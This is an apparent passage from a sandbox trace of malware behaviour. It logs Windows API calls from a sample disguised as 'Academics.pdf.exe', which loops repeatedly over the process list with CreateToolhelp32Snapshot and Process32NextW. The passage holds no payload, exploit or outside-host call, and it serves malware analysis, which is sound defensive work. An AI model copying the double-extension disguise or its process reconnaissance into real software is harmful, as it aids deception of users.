cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0319.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0319.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0319.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0319.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0319.900] CloseHandle (hObject=0x294) returned 1 [0319.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0319.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0319.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0319.901] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0319.901] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0319.903] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0319.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0319.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0319.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0319.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0319.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0319.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0319.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0319.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0319.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0319.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0319.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0319.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0319.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0319.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0319.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0319.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0319.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0319.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0319.937] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0319.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0319.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0319.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0319.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0319.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0319.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0319.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0319.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0319.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0319.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0319.946] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0319.947] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.948] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0319.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0319.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0319.951] CloseHandle (hObject=0x294) returned 1 [0319.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.951] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.951] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0319.953] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.954] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0319.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0319.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.962] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0319.963] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.964] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0319.965] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0319.965] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0319.966] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0319.967] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.968] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.969] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.969] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.970] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.971] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0319.972] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.973] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.974] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0319.974] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0319.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0319.976] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0319.977] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 